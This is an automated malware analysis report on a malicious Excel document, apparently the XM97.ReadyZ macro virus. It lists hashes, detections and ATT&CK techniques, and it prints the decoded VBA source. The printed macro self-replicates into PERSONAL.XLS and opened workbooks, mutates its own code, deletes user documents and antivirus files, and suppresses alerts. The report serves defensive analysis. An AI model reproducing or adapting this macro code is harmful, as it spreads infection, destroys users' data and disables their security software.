Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3bd9e0d6552c334b…

MALICIOUS

Office (OLE)

Size: 46.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: a0f18ea1f440ecda561c8c3e600a3c7a
SHA-1: f20bfe734883d62d3a4b9df2bf6ee9e368294f9b
SHA-256: 3bd9e0d6552c334b8d9058d65019e0a7be4570fcc96fe86f80cff035ab85d504
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection and high-severity heuristic for an Auto_Open macro indicate malicious intent. The Auto_Open VBA macro is designed to execute automatically upon opening the Excel file, likely to download and execute a secondary payload. The presence of VBA macros points to the T1059.005 (Visual Basic) technique, and the overall nature of malicious Office documents suggests T1566.001 (Spearphishing Attachment) as the likely initial access vector.

Heuristics (3)

  • ClamAV: Xls.Trojan.Ready-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Ready-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4517 bytes
SHA-256: 94d22bc61b21284a706829a414eb7f780c98ae3425b400aebaadcbadfe185a10

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ReadyZ"
Sub Auto_Open()

    ' -= [LineZerØ's Macro Engine 1.2] =-
    ' -= [XM97.ReadyZ] =-

    ' -= [ID: 21477-Gj-64002738-Jm.X] =-

Application.OnSheetActivate = "UxO9054"
End Sub

Sub UxO9054()
On Error Resume Next
VoNzRz3435 = "ReadyZ"
PoRrNm9054 = "PERSONAL.XLS"
EgVyTl6400 = Application.StartupPath & "\" & PoRrNm9054
HsNrFv3285PoRrNm2738 = 0
NyCzTm9054VoNzRz6400 = 0
With Application
.StatusBar = "XM97.ReadyZ"
.ScreenUpdating = False
.DisplayAlerts = False
.EnableCancelKey = xlDisabled
End With
CommandBars("Tools").Controls(10).Delete
CommandBars("Tools").Controls(12).Delete
CommandBars("View").Controls(3).Delete
CommandBars("Window").Controls(3).Delete
CommandBars("Window").Controls(4).Delete
 'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("ReadyZ").CodeModule.ProcCountLines("UxO9054", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("ReadyZ").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
VD8435 = GetSetting("ReadyZ", "ICounter", "Count", "")
If VD8435 = 20 Then
Kill ("c:\my documents\*.*")
Call Gj6400
Call HsNrFvVD
End If
Application.VBE.ActiveVBProject.VBComponents.Item(VoNzRz3435).Export "C:\ReadyZ.sys"
If Dir(EgVyTl6400) = PoRrNm9054 Then NyCzTm9054VoNzRz6400 = 1
For x = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(x).Name = VoNzRz3435 Then HsNrFv3285PoRrNm2738 = 1
Next x
If HsNrFv3285PoRrNm2738 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys"
ActiveWorkbook.Save
End If
If NyCzTm9054VoNzRz6400 = 0 Then
Workbooks.Add.SaveAs FileName:=EgVyTl6400
ActiveWorkbook.VBProject.VBComponents.Import "C:\ReadyZ.sys"
ActiveWindow.Visible = False
Workbooks(PoRrNm9054).Save
End If
Call Jm9054
End Sub
Sub HsNrFvVD()
On Error Resume Next
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\N
... (truncated)